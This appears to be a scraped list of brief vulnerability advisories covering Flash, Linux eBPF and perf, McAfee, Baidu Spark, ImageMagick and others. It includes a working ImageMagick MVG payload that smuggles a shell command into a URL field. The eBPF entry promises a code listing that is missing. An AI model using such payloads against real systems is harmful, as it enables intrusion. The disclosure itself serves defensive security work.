There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
Irving Aguilar discovered a buffer overflow vulnerability in CIScanv1.00 Hostname/IP Field. An attacker can exploit this vulnerability by running a python code, copying the content of the generated file to clipboard, pasting it in the Hostname/IP field of CIScan.exe, clicking the add button and then clicking the Accept button, which will cause the application to crash.
There is a use-after-free vulnerability in MovieClip.duplicateMovieClip. If an action associated with the MovieClip frees the clip provided as the initObject parameter to the call, it will be used after it is freed.
Irving Aguilar discovered a buffer overflow vulnerability in RPCScan v2.03. The vulnerability is triggered when a maliciously crafted string is copied to the clipboard and pasted into the Hostname/IP field of the application. This causes a denial of service condition.
The baidu spark browser is vulnerable to Address Bar Spoofing in the latest version of the browser(43.23.1000.476). Using the special javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. It can be used to phishing attack.
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows: __bpf_map_get contains the following code: The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table entry was stale, it will have already called fput() on the struct file, and the second call to fdput() will cause a use-after-free.
A race condition in perf_event_open() allows local attackers to bypass the ptrace_may_access() check and the perf_event_exit_task(current) call that is performed in install_exec_creds() during privileged execve() calls. This allows attackers to observe the execution of setuid executables using performance event monitoring, which can be used to leak interesting data by setting up sampling breakpoint events (PERF_TYPE_BREAKPOINT) that report userspace register contents (PERF_SAMPLE_REGS_USER) to the tracer.
Fuzzing packed executables with McAfee's LiveSafe 14.0 on Windows found a signedness error parsing sections and relocations. The attached fuzzed testcase demonstrates this and causes a crash in mscan64a.dll. The code runs as SYSTEM on Windows, with no sandboxing and is used to parse untrusted remote input. The code is trying to read a byte from 0x90000fff, which is obviously invalid.
TLS-Attacker is a tool that can be used to build a proof of concept and test implementations for the Padding Oracle Attack vulnerability. It is a Java-based tool that can be used to send a specially crafted ClientHello message to the server, which can then be used to decrypt the encrypted data. The xml configuration file (rsa-overflow.xml) contains the ClientHello message, which includes the supported cipher suites, compression methods, and elliptic curves. The ClientKeyExchange message also includes a flag to enable the padding oracle attack.
ImageMagick allows to process files with external libraries. This feature is called 'delegate'. It is implemented as a system() with command string ('command') from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection. One of the default delegate's command is used to handle https requests: 'wget' -q -O '%o' 'https:%M' where %M is the actual link from the input. It is possible to pass the value like `https://example.com"|ls "-la` and execute unexpected 'ls -la'. (wget or curl should be installed) exploit.mvg -=-=-=-=-=-=-=-=- push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com"|ls "-la)' pop graphic-context
Services By CQR